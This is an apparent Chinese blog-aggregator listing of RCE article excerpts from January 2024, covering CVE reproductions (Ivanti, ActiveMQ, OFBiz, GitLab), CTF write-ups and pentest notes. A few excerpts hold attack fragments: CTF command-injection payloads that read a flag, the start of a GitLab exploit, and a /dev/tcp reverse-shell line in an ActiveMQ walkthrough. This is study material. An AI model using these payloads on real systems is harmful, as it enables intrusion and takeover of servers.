rce

Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)

0x01产品简介ViessmannVitogate300是用于将ViessmannLON连接到BACnet或Modbus的网关。0x02漏洞概述Vitogate300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。0x03影响范围version<=2.1.3.00x04复现环境FOFA:app="Vito
OidBoy_G·2024-01-23 10:54

2023年春秋杯网络安全联赛冬季赛 Writeup

modules明文混淆PwnnmanagerbookReupx2023CryptoCFisCryptoFaker挑战题勒索流量Ezdede可信计算Webezezez_php反序列化打redis主从复制RCE
末 初·2024-01-23 07:21

网络安全全栈培训笔记(56-服务攻防-数据库安全&H2&Elasticsearch&CouchDB&Influxdb复现)

Elasticsearch&CouchDB&Influxdb复现知识点:1、服务攻防数据库类型安全2、influxdb,.未授权访问wt验证3、H2database-未授权访问-配置不当4、CouchDB-权限绕过配合RCE
清歌secure·2024-01-23 07:33

网络安全全栈培训笔记(55-服务攻防-数据库安全&Redis&Hadoop&Mysqla&未授权访问&RCE

第54天服务攻防-数据库安全&Redis&Hadoop&Mysqla&未授权访问&RCE知识点:1、服务攻防数据库类型安全2、Redis&Hadoop&Mysql安全3、Mysql-CVE-2012-2122
清歌secure·2024-01-23 07:24

Jeecg jeecgFormDemoController RCE漏洞复现(CVE-2023-49442)

0x01产品简介Jeecg(J2EECodeGeneration)是一款基于代码生成器的低代码开发平台,使用JEECG可以简单快速地开发出企业级的Web应用系统。0x02漏洞概述Jeecg(J2EECodeGeneration)是开源的代码生成平台,目前官方已停止维护。Jeecg4.0及之前版本中,由于/api接口鉴权时未过滤路径遍历,攻击者可构造包含../的url绕过鉴权。并且内部有使用fast
OidBoy_G·2024-01-22 15:39

HackTheBox - Medium - Linux - Noter

由于“MySQL”守护进程以用户“root”身份运行,因此可以通过利用“MySQL”的用户定义函数来利用它来获得RCE并将我们的权限升级到“root”。
Sugobet·2024-01-22 08:23

ctfshow-反序列化(web271-web276)

目录web271web272-273web274web275web276为什么不用分析具体为什么能成功,后面会有几个专题会对php框架进行更深入的了解这里面会专门的研究为什么能够实现RCE前面作为初步的熟悉首先知道一下他的框架知道框架的风格知道啥版本可以用什么来打首先先不用太研究这样的话自己会感觉会难所以以后再说随着积累刚开始不理解的地方做的多了就豁然开朗就像收集的框架确定有用后可以保留以后没准遇
网安小t·2024-01-21 08:34

网络安全B模块(笔记详解)- 远程代码执行渗透测试

1.从靶机服务器场景FTP服务器中下载文件RCE.py,编辑该Python程序文件,使该程序实现对Server7进行远程代码执行渗透测试的功能,填写该文件当中空缺的F1字符串,将该字符串作为flag值提交
何辰风·2024-01-20 17:37

CloudPanel RCE漏洞复现(CVE-2023-35885)

0x01产品简介CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机(VM)、存储、网络和应用程序。0x02漏洞概述由于2.3.1之前的CloudPanel具有不安全的文件管理器cookie身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务
OidBoy_G·2024-01-20 07:41

[NSSRound#16 Basic]RCE但是没有完全RCE

题目代码:
Fab1an·2024-01-19 13:36

Ivanti VPN RCE漏洞复现(CVE-2024-21887)

0x01产品简介IvantiConnectSecure,原名PulseConnectSecure,是一款企业级远程访问解决方案。这个产品主要提供安全远程访问(VPN),多因素认证等功能。0x02漏洞概述IvantiConnectSecure(9.x,22.x)和IvantiPolicySecure(9.x,22.x)的web组件中存在身份验证绕过漏洞(CVE-2023-46805)和命令注入漏洞(
OidBoy_G·2024-01-19 04:31

网络安全部分基本术语

RCE(rem
wawa0611·2024-01-18 22:20

从0学代码审计 | thinkphp 5.0.23 RCE

目录0x01前言0x02thinkphpRCE分析poc1poc20x03结语本文由掌控安全学院-xilitter投稿0x01前言ThinkPHP是一款开源的PHP框架,用于快速、简单地开发PHP应用程序。它提供了一套丰富的功能和工具,使开发者能够更容易地构建各种规模的Web应用。ThinkPHP的目标是提高开发效率,同时保持代码的可读性和可维护性。thinkphp的许多版本中也爆出了多个漏洞,本
运维Z叔·2024-01-18 09:25

polar CTF 简单rce

一、题目nonono二、解题1、知识passthru()只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。(替换system)payloadget?sys=passthru('ls%09/');postyyds=666payloadget?sys=passthru('sort%09/flag');postyyds=666
samRsa·2024-01-17 23:46

[SWPUCTF 2022 新生赛]1z_unserialize

>直接将$a赋值为system,也就是将$this->lt赋值为system,那么$this->lly就可以赋值成任意命令,造成RCE。构造代码如下:
妙尽璇机·2024-01-17 23:06

[NSSCTF Round#16 Basic]RCE但是没有完全RCE

RCE但是没有完全RCEwp题目代码:第一关
妙尽璇机·2024-01-17 23:35

SRC实战 | 从404到RCE+未授权

本文由掌控安全学院-17828147368投稿这次开局不顺啊,打开页面404准备放弃,但是。。。。。继续吧,相信奇迹会出现404页面没有可以测试的点,怎么办,扫目录,最好能扫出个未授权,先用dirsearch自带字典扫一波很好,没有,你成功引起了我的注意,现在就要拿出我自己的祖传字典了,如果你没有祖传字典可以使用下面这个,看星星数量就知道这玩意好github地址:https://github.co
黑客大佬·2024-01-17 14:33

实战纪实|从接口信息泄露到RCE

本文由掌控安全学院-杳若投稿打点开局一个登录框信息收集发现了一处接口泄露了部分信息不过只有支付宝密钥的信息无法扩大危害,此时尝试寻找了一下其他同类型系统同样的接口,查看一下是否泄露的信息相同PS:因为如果相同就说明是静态的,没有价值横向收集此时访问其他系统,发现里面有不一样的东西,包含了数据库的账号以及密码PS:说明不是静态的利用尝试此时回到之前的系统,扫了一下端口,发现确实开放了数据库端口利用工
黑客大佬·2024-01-17 14:32

ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

前言本节我将分析thinkphp5.0.x版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路本次分析框架下载,由于官方已经下架了相关的下载接口,这里我们用三方下载一份v5.0.22版本的升级中...https
昵称还在想呢·2024-01-17 08:11

科荣AIO UtilServlet 前台RCE漏洞复现

0x01产品简介科荣AIO企业⼀体化管理解决⽅案通过ERPERP(进销存财务)、OAOA(办公⾃动化)、CRMCRM(客⼾关系管理)、UDPUDP(⾃定义平台),集电⼦商务平台、⽀付平台、ERP平台、微信平台、移动APP等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。0x02漏洞概述科荣AIOUtilServlet接口处存远程代码执行漏洞,未经身份验证的攻击者可通过该
OidBoy_G·2024-01-17 03:07

超过三分之二的 FortiGate 防火墙仍面临风险

该缺陷(CVE-2023-27997)可导致远程代码执行(RCE)。Fortinet于6月中旬对其进行了修补。
JJJ69·2024-01-17 03:55

HackTheBox - Medium - Linux - Mentor

枚举容器'的网络在另一个容器上显示“PostgreSQL”服务,可以通过使用默认凭据进行身份验证来将其用于RCE。检查“Po
Sugobet·2024-01-16 22:42

GitLab 远程命令执行漏洞(CVE-2021-22205)

此次受影响版本为11.9')defget_payload(command):rce_payload=b'\x41\x54\x26\x54\x46\x4f\x52\x4d'rce_payload+=(len
weixin_42299610·2024-01-16 08:39

Spring-boot远程代码执行系列(eureka xstream deserialization RCE

3.目标机器相关依赖解析payload,触发XStream反序列化,造成RCE漏洞。0x2漏洞利用条件1.可以POST请求目标网站的/
LQxdp·2024-01-16 08:01

Gitlab 远程命令执行RCE漏洞CVE-2021-22205附exp

0x01漏洞介绍&原理GitLab是由GitLabInc.开发的一个用于仓库管理系统的开源项目,是一款Ruby开发的Git项目管理平台。由于在11.9以后的GitLab中,使用了图片处理工具ExifTool,而此图片处理工具又受到了漏洞CVE-2021-22204的影响:漏洞触发ExifTool功能处,ExifTool是用于从图像中移除元数据的开源工具,在解析上传图像中的元数据时,并没有完全解析某
god_Zeo·2024-01-16 08:30

PostgreSQL从弱口令到RCE(CVE-2019-9193)

0x01简介PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPYTO/FROMPROGRAM”权限的用户,可以使用这个特性执行任意命令。0x02影响版本postgresql9.3-110x03漏洞复现1、使用“超级弱口令”爆破处postgresql数据库账号密码。2、使用“NavicatPremium”连接postgresql数据库后执行下列语句。D
LQxdp·2024-01-16 08:30

shrio1.2.4反序列化分析

damit5.github.io/raw/master/2019/09/26/Apache-Shiro-RememberMe-1-2-4-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE
AxisX·2024-01-15 13:47

人类驯服单片机珍贵资料 且用且珍惜【STM32F103项目开发大典】

链接:https://pan.baidu.com/s/1TVJqcwpVYu9rcE-ILBpR-Q?
vx349014857·2024-01-15 06:01

[NSSCTF Round#16 Basic]RCE但是没有完全RCE

[NSSCTFRound#16Basic]RCE但是没有完全RCE第一关
_rev1ve·2024-01-14 23:52

SpiderFlow爬虫平台 前台RCE漏洞复现(CVE-2024-0195)

0x01产品简介SpiderFlow是新一代爬虫平台,以图形化方式定义爬虫流程,以流程图的方式定义爬虫,不写代码即可完成爬虫,是一个高度灵活可配置的爬虫平台。0x02漏洞概述SpiderFlow爬虫平台src/main/java/org/spiderflow/controller/FunctionController.java文件的FunctionService.saveFunction函数中发现
OidBoy_G·2024-01-14 17:13

CVE-2023-33246 RCE漏洞复现

CVE-2023-33246RCE漏洞复现漏洞描述在RocketMQ5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller
七堇墨年·2024-01-14 13:34

漏洞复现-天融信TOPSEC static_convert 远程命令执行漏洞(附漏洞检测脚本)

传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述该系统static_convert.php接口处存在RCE漏洞
炼金术师诸葛亮·2024-01-14 07:33

【复现】网康科技-防火墙存在RCE漏洞_17

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述网康下一代防火墙(NGFW)是一款可以全面应对应用层威胁的高性能防火墙。通过深入洞察网络流量中的用户、应用和内容,并借助全新的高性能单路径异构并行处理引擎,NGFW能够为用户提供有效的应用层一体化安全防护,帮助用户安全地开展业务并简化用户的网络安全架构。二.漏洞影响通过提交恶意构造的参数破坏命令语句结构
穿着白衣·2024-01-14 05:46

OFBiz RCE漏洞复现(CVE-2023-51467)

漏洞名称ApacheOFBiz鉴权绕过导致命令执行漏洞描述ApacheOFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎,服务引擎,消
CVE-Lemon_i·2024-01-14 04:03

ActiveMQ反序列化RCE漏洞复现(CVE-2023-46604)

漏洞名称ApacheActiveMQOpenWire协议反序列化命令执行漏洞漏洞描述ApacheActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、SpringFramework等。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在ApacheActiveMQ5.18.2版本及以前,OpenWire协议通信过程中
CVE-Lemon_i·2024-01-14 04:30

Ncast盈可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)

产品介绍Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。漏洞描述广州盈可视电子科技有限公司的高清智能录播系统存在信息泄露漏洞(CVE-2024-0305),攻击者可通过该漏洞,利用访客身份未授权访问/manage/IPSetup.php后台功能模块,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。资产测绘app=“Ncast-
keepb1ue·2024-01-13 19:20

nssctf round#4

参考:[NSSRound#4]复现_ThnPkm的博客-CSDN博客目录webez_rce1zweb1zweb(revenge)(1)正确思路但结果不合预期(2)进行解决的各种尝试与思考MiscSingin
葫芦娃42·2024-01-13 18:44

NSSCTF Round#7 Team ez_rce和0o0讲解

ez_rce刚看到差点被这个被这个吓到,还以为第一题就是java安全,仔细一看就是运行了一个jar文件,然后我们可以自定义action和data的值,这里就可以用到||这个了,||旁边两个都可以执行的,
练习两年半的篮球选..哦不对安全选手·2024-01-13 18:10

【Web】NSSCTF Round#16 Basic个人wp(全)

目录①RCE但是没有完全RCE②了解过PHP特性吗①RCE但是没有完全RCE上来就是一段md5八股(string)就是不让用数组了,然后强比较需要md5碰撞?
Z3r4y·2024-01-13 18:37

Apache ActiveMQ RCE漏洞复现

ApacheActiveMQRCE漏洞复现1、产品简介ActiveMQ是一种开源的基于JMS(JavaMessageServie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。2、漏洞概述ApacheActiveMQ中存在远程代码执行漏洞,Apac
别JUAN我·2024-01-13 10:52

【复现】Spider-Flow RCE漏洞(CVE-2024-0195)_16

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述SpiderFlow是一个高度灵活可配置的爬虫平台,用户无需编写代码,以流程图的方式,即可实现爬虫。该工具支持多数据源、自动保存至数据库、任务监控、抓取JS动态渲染页面、插件扩展(OCR识别、邮件发送)等功能。二.漏洞影响通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。继承Web服务
穿着白衣·2024-01-12 20:19

BUUCTF刷题记录

host='-oGhack.php'把这串东西拼接到靶场地址后面,蚁剑链接http://靶场地址/沙箱地址/hack.php蚁剑链接flag在根目录下直接RCE:?
块块0.o·2024-01-12 12:45

Apache Ofbiz XML-RPC RCE漏洞复现(CVE-2023-49070)

0x01产品简介ApacheOFBiz是一个开源的企业资源规划(ERP)系统,提供了多种商业功能和模块。0x02漏洞概述漏洞成因2020年,为修复CVE-2020-9496增加权限校验,存在绕过。2021年,增加Filter用于拦截XML-RPC中的恶意请求,存在绕过。2023年四月,彻底删除xmlrpchandler以避免同类型的漏洞产生。尽管主分支在四月份已经移除了XML-RPC组件,但在Ap
OidBoy_G·2024-01-12 06:13

漏洞复现--Apache Ofbiz XML-RPC RCE(CVE-2023-49070)

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责一:漏洞描述近日,亚信安全CERT监控到ApacheOFBiz发布更新公告,修复了ApacheOFBiz中的一个未授
芝士土包鼠·2024-01-12 06:13

Ncast盈可视 高清智能录播系统 IPSetup.php信息泄露+RCE漏洞复现(CVE-2024-0305)

0x01产品简介Ncast盈可视高清智能录播系统是广州盈可视电子科技有限公司一种先进的音视频录制和播放解决方案,旨在提供高质量、高清定制的录播体验。该系统采用先进的摄像和音频技术,结合强大的软件平台,可以实现高清视频录制、多路音频采集、实时切换和混音、定制视频分析等功能。0x02漏洞概述广州盈可视电子科技有限公司高清智能录播系统可通过访客身份未授权访问/manage/IPSetup.php后台功能
OidBoy_G·2024-01-12 01:27

K8S后渗透横向节点与持久化隐蔽方式探索

前言通常在红蓝对抗中,我们可能会通过各种方法如弱口令、sql注入、web应用漏洞导致的RCE等方法获得服务器的权限;在当前云原生迅猛发展的时代,这台服务器很可能是一个容器,在后续的后渗透由传统的提权变为容器逃逸
杭州默安科技·2024-01-11 19:31

Apache ActiveMQ RCE CNVD-2023-69477 CVE-2023-46604

漏洞简介ApacheActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过ApacheActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制ApacheActiveMQ服务器。影响版本Apache ActiveMQ 5.18.0 before 5.18.3Apache ActiveMQ 5.17.0 before 5.17.6Apache Acti
合天网安实验室·2024-01-11 10:47

Apache ActiveMQ RCE漏洞复现

ApacheActiveMQRCE漏洞复现(CNVD-2023-69477)1、漏洞版本ApacheActiveMQpingne5q0v.dnslog.cn反弹shell的poc.xmlbash-c&/dev/tcp/ip/端口0>&1]]>3、复现过程1、在本地含有poc.xml的文件夹下开启http服务python-mhttp.server#默认端口为8000可以正常访问即为开启成功2、通过A
知鱼~·2024-01-11 07:09

Apache ActiveMQ RCE CNVD-2023-69477 CVE-2023-46604

漏洞简介ApacheActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过ApacheActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制ApacheActiveMQ服务器。影响版本Apache ActiveMQ 5.18.0 before 5.18.3Apache ActiveMQ 5.17.0 before 5.17.6Apache Acti
蚁景网络安全·2024-01-11 07:09

Spring Cloud Function SpEL注入漏洞(CVE-2022-22963)分析

Spring是一种流行的开源Java框架,该漏洞与另一个相关的远程代码执行(RCE)漏洞(SpringCore,即“Spring4Shell”)均可通过AkamaiAdaptiveSecurityEngine
Akamai中国·2024-01-11 06:29
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他